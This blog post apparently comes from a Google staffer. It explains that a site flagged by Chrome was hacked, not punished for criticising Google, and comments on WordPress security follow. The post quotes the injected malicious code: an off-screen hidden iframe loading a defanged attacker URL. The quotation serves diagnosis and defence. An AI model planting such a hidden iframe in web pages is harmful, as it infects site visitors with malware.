Malware warning

Recently someone on twitter complained that Chrome was labeling their site as malware:

http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.

I took a few minutes to compose a reply, so I’ll go ahead and post it here:

Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages.

At the top of the page, the malicious iframe looks like this: <style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class=”rrfhezo”><iframe src=”hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js” width=”420″ height=”475″></iframe>

I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code.

We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/

Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome.

Hope that helps,
Matt Cutts

I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.

14 Responses to Malware warning (Leave a comment)

  1. I have difficulty understanding the reason for hacks. Is it purely to inject links, is it for acclaim or some other reason ?

    • It can be to inject links in order to promote another url, or in this case, to add malware directly to the server’s pages and spread the infection to anyone that visits a page.

      • Thanks for the reply, Yes I guess that malware infections are now spread this way more often than email. This type of infection could I suspect include a trojan and open your computer to zombie control, keyloggers and all sorts of nasties. Its unfortunate for the website concerned but Google are correct to protect their users.

  2. I’ve said this before and I’ll say it again…and Trend Micro has offered similar sentiments on this in the recent past, so I know I’m not alone. WordPress is an absolutely horrible, insecure platform, and even the latest version can be hacked, as Dvorak appears to be (it may not have been at the time, though…I don’t know).

    Having had multiple client WordPress sites hacked (I’ll avoid it like the bubonic plague now unless there is no other alternative), I can speak first-hand to Google’s awareness of the situation and how Webmaster Tools will inform the website owner of exactly what the hack is, where it came from, and what it links to. So it’s not like it’s speculative on big G’s part…they have reason to know.

    The only complaint I have about big G, and it’s not a complaint as much as it is a sheer nitpick, is that they don’t give even general advice to people on how to fix a situation like this. It would probably save a whole lot of time and grief if big G put up pages that said, “My WordPress site is hacked…what should I do?” Step 1: change any and all passwords. Step 2: update to the latest version. Step 3: make sure server is up to date. And so on and so on.

    I did find it funny that the Dvorak guy put his tinfoil hat on but was defending against the wrong person, though. Don’t assume SEO parasites are out to get you…assume Google is.

    I love the domain that hacked him, too. Organic crap. I hate that machine-produced factory-processed kind.

    • We can all find reasons to beat up on WordPress but most WordPress sites don’t get hacked. Keeping the hackers off your server is 40% of the battle. Keeping your WordPress installations up-to-date is another 45% of the battle. The remaining 15% of the battle comes down to diligence — and that’s just like with any other platform. They can all be hacked. Anyone who believes otherwise is a train wreck waiting to happen.

      • Yes, any site is hackable. Any software is, and any script is. That’s the nature of security…true security doesn’t exist. No one suggested otherwise.

        The problem with WordPress is in that 45%…you actually have to spend time downloading updates whenever WP releases them. You have to download plugin updates whenever they’re released. If your theme uses something like WooThemes, that needs to be updated. That takes time that doesn’t need to be taken. If a site is built in a half-decent manner in the first place, it can run for years without requiring constant, or if you really get it down pat any, updates. That’s a significant difference.

        It’s also why big G can accurately report on a hack attempt…a large enough volume of sites are affected that a pattern can clearly be determined. In order for that to happen, there has to be some common thread connecting all of these sites. Whether “most sites” aren’t hacked is immaterial…the relevant factors are the size of the hack attempt, its potential impact, and the source of the problem. In this case, it’s WordPress.

        Big G isn’t alone here, either. Again, Trend Micro has been saying this for years and the empirical evidence is there for anyone to see.

  3. EDIT: what I meant to say was that they don’t link to the general advice on hacking, not that they don’t have a hacked page. I knew about the hacked section, but I meant that in the times I’ve seen sites hacked, it wasn’t tied to WMT.

  4. Funny this guy thinks it is because “after I wrote negative commentary about Google”.

    I would have thought that unlikely, as negative comments about Google are hardly going to get a site blocked by Google. I ma sure there are plenty og Gogle bashing pages around which would attest to this.

    I am fairly sure this iframe hacking thing is similar to what I found in someones site who has been in business over 30 years and last year lost all his ranked search results.

    It can be quite difficult to get people to keep their sites updated though.

    What advice would you give to website owners who never really login to any Google webmaster things to check warnings and who work full time on their offline things but need websites online to bring in business but have very limited understanding of such things Matt?

    I know a few of people who rarely check in on anythign RE their sites, and I mean it can be months between paying any attention to such things.

  5. Plenty of Google bashing pages as well as “og Gogle bashing pages” to 🙂

  6. Stange thing i learned from these issues is that it doesn’t matter if you run a static html site or a php site with database even if it runs the newest version. Everyone is hackable. Most of the time they edit files with their piece of code and even manage to upload some files. They get access trough ftp or holes caused bij bad coded scripts or even server issues. Always have a clean backup (saves you a lot of time in stead of checking for infected files or database) to upload so that you can delete everything on your server and change all of your passwords.

  7. Hello Matt,

    This is an excellent write up and Google is doing a great job trying to help people.

    When people are hacked it is human nature to want to blame someone, often the messenger.

    Google has made great videos about how this happens, and what to do to fix it.

    I know I can be very critical of Google, however I would like you to see that I can also compliment and praise Google when Google does fantastic work like the hacked site videos Google has made to help people.

  8. Hello Rob,

    You make a misleading statement:

    >Stange thing i learned from these issues is that it doesn’t matter if you run a static html site >or a php site with database even if it runs the newest version. Everyone is hackable.

    The above is true, however if you have a static HTML site your chances of being hacked are much less. Many times less chance of being hacked …

    Since we switched to static HTML sites several years ago, we have not been hacked. When we used WordPress we were being hacked all the time, many times a year, even if you update WordPress often.
    I also try to steer people away from using WordPress because of all the hacker issues and problems.

    • WordPress is a common platform so hacking it reaps much more reward than hacking a static html site. Typically static sites are not web 2.0 and allow little interaction with the user, therefore XSS doesn’t come into play. But wordpress is a powerfull and simple method of creating a blog and can be kept secure. I mean this very blog is wordpress remember.

    • @Tom You’re right, it’s a bit misleading. Static HTML is secure. I just want to say that no one is safe. With static HTML they have to use other holes in your security (server related or through ftp).

css.php